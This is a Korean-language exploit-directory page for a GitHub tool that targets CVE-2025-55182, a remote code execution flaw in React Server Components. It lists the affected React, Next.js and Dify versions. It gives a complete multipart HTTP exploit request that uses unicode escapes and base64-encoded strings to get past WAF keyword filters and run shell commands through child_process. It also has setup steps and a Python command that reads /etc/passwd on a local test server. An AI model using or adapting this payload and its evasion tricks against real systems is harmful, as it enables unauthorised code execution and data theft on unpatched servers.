Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-55182-React-RCE — [취약점 재현] 전 세계 최초의 RSC 기능 기반 WAF 탐지를 우회하는 CVE-2025-55182 React Server RCE 취약점 EXP。 | Kitploit
도구/GitHubGitHub/xcanwin/cve-2025-55182-react-rce
Vulnerability AnalysisExploitationWeb Application ExploitationWAF BypassPenetration TestingPayload Development
GitHubxcanwin/cve-2025-55182-react-rce

CVE-2025-55182-React-RCE

[취약점 재현] 전 세계 최초의 RSC 기능 기반 WAF 탐지를 우회하는 CVE-2025-55182 React Server RCE 취약점 EXP。

저장소 보기
1549개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-55182-React-RCE

프로젝트 소개 및 원리

  • 전 세계 최초로 RSC 기능을 기반으로 WAF 탐지를 우회할 수 있는 CVE-2025-55182 React Server RCE 취약점 EXP.
  • The world’s first CVE‑2025‑55182 React Server RCE exploit that can bypass WAF detection by leveraging RSC-specific features.
  • React Server 기본 환경에서 RCE를 구현합니다.
  • 새로운 독창적인 EXP를 추가하여 WAF 우회 시나리오를 지원합니다. 원리: getOutlinedModel에서 블록 간 및 단계별 JSON 참조 가능.
  • 최대한 간결한 재현 환경을 제공합니다.

EXP의 장점

  • __proto__:then, constructor:constructor 없이 RCE 가능.
  • WAF가 자주 차단하는 키워드가 나타나지 않음: "then": $1:__proto__:then, "get": $1:constructor:constructor, require('child_process').
  • 하나의 EXP가 기본 설정의 네이티브 React Server, Next.js, Dify 환경과 호환됩니다.

재현 환경의 장점

  • 극도로 간결함.
  • 빠른 구축.

취약점 개요

정보내용
취약점 이름React Server RCE
취약점 번호CVE-2025-55182
위험 등급고위험
취약점 유형RCE
공격 난이도낮음

영향 버전

  • React 영향 버전 == 19.0.0
  • React 영향 버전 == 19.0.1
  • React 영향 버전 == 19.1.0
  • React 영향 버전 == 19.2.0
  • react-server-dom-webpack 패키지 영향 버전 == 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-parcel 패키지 영향 버전 == 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-turbopack 패키지 영향 버전 == 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.2.0
  • Next.js 영향 버전 >= 14.3.0-canary.77
  • Next.js 15.0.0 <= 영향 버전 < 15.0.5
  • Next.js 15.1.0 <= 영향 버전 < 15.1.9
  • Next.js 15.2.0 <= 영향 버전 < 15.2.6
  • Next.js 15.3.0 <= 영향 버전 < 15.3.6
  • Next.js 15.4.0 <= 영향 버전 < 15.4.8
  • Next.js 15.5.0 <= 영향 버전 < 15.5.7
  • Next.js 16.0.0 <= 영향 버전 < 16.0.7
  • Dify 1.1.2 <= 영향 버전 < 1.10.1-fix.1

EXP 1

WAF 우회 시나리오 + 기본 시나리오에 사용 가능:

root@kitploit:~
POST / HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Next-Action: test
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jxCaNwiNWP3Sad
Content-Length: 1445

------WebKitFormBoundaryx8jxCaNwiNWP3Sad
Content-Disposition: form-data; name="0"

"$@1"
------WebKitFormBoundaryx8jxCaNwiNWP3Sad
Content-Disposition: form-data; name="1"

{
    "\u0074\u0068\u0065\u006e": "$2:et",
    "status": "$2:es",
    "reason": "",
    "value": "$2:ev",
    "_response": "$2:er"
}
------WebKitFormBoundaryx8jxCaNwiNWP3Sad
Content-Disposition: form-data; name="2"

{
    "et": "$3",
    "es": "$4",
    "ev": "{\"\u0074\u0068\u0065\u006e\":\"\u0024\u0042\"}",
    "er": {
        "_prefix": "$2:ep",
        "_formData": "$2:ef"
    },
    "ep": "$5",
    "ef": {
        "get": "$2:eg"
    },
    "eg": "$6"
}
------WebKitFormBoundaryx8jxCaNwiNWP3Sad
Content-Disposition: form-data; name="3"

"$0:\u0074\u0068\u0065\u006e"
------WebKitFormBoundaryx8jxCaNwiNWP3Sad
Content-Disposition: form-data; name="4"

"\u0072\u0065\u0073\u006f\u006c\u0076\u0065\u0064\u005f\u006d\u006f\u0064\u0065\u006c"
------WebKitFormBoundaryx8jxCaNwiNWP3Sad
Content-Disposition: form-data; name="5"

"x='Y2F0IC9ldGMvcGFzc3dk';d=u=>Buffer.from(u,'bas'+'e64')+'';y=global[d('cHJvY2Vzcw==')][d('bWFpbk1vZHVsZQ==')][d('cmVxdWlyZQ==')](https://github.com/xcanwin/cve-2025-55182-react-rce/blob/main/d%28%27Y2hpbGRfcHJvY2Vzcw%3D%3D%27))[d('ZXhlY1N5bmM=')](https://github.com/xcanwin/cve-2025-55182-react-rce/blob/main/d%28x))+'';throw Object.assign(new Error(y),{digest:y});"
------WebKitFormBoundaryx8jxCaNwiNWP3Sad
Content-Disposition: form-data; name="6"

"$0:toString:\u0063\u006f\u006e\u0073\u0074\u0072\u0075\u0063\u0074\u006f\u0072"
------WebKitFormBoundaryx8jxCaNwiNWP3Sad--

재현 1

  1. 서버 환경:
root@kitploit:~
react-server-dom-webpack 19.2.0
  1. 서버에서 react-server-dom-webpack에 필요한 의존성을 다운로드하고 설치합니다:
root@kitploit:~
git clone https://github.com/xcanwin/CVE-2025-55182-React-RCE
cd CVE-2025-55182-React-RCE
npm install
npm run dev -- --hostname 127.0.0.1 --port 3000

서비스 구축 성공: http://127.0.0.1:3000/

  1. 클라이언트에서 EXP 사용
root@kitploit:~
python3 -m venv .venv
. ./.venv/bin/activate
pip3 install requests
python3 CVE-2025-55182-React-RCE.py --url http://127.0.0.1:3000/ --exp "cat /etc/passwd"

재현 2

  1. 서버 환경:
root@kitploit:~
Next.js 16.0.6
사실 react-server-dom-webpack 19.2.0에 해당합니다.
  1. 서버에서 Next.js에 필요한 의존성을 다운로드하고 설치합니다:
root@kitploit:~
git clone https://github.com/xcanwin/CVE-2025-55182-React-RCE
cd CVE-2025-55182-React-RCE
npx [email protected] nextapp --yes --js --no-tailwind --no-eslint --empty
cd nextapp
npm run dev -- --hostname 127.0.0.1 --port 3000

서비스 구축 성공: http://127.0.0.1:3000/

  1. 클라이언트에서 EXP 사용 (위와 동일)
root@kitploit:~
python3 CVE-2025-55182-React-RCE.py --url http://127.0.0.1:3000/ --exp "cat /etc/passwd"
도구 다운로드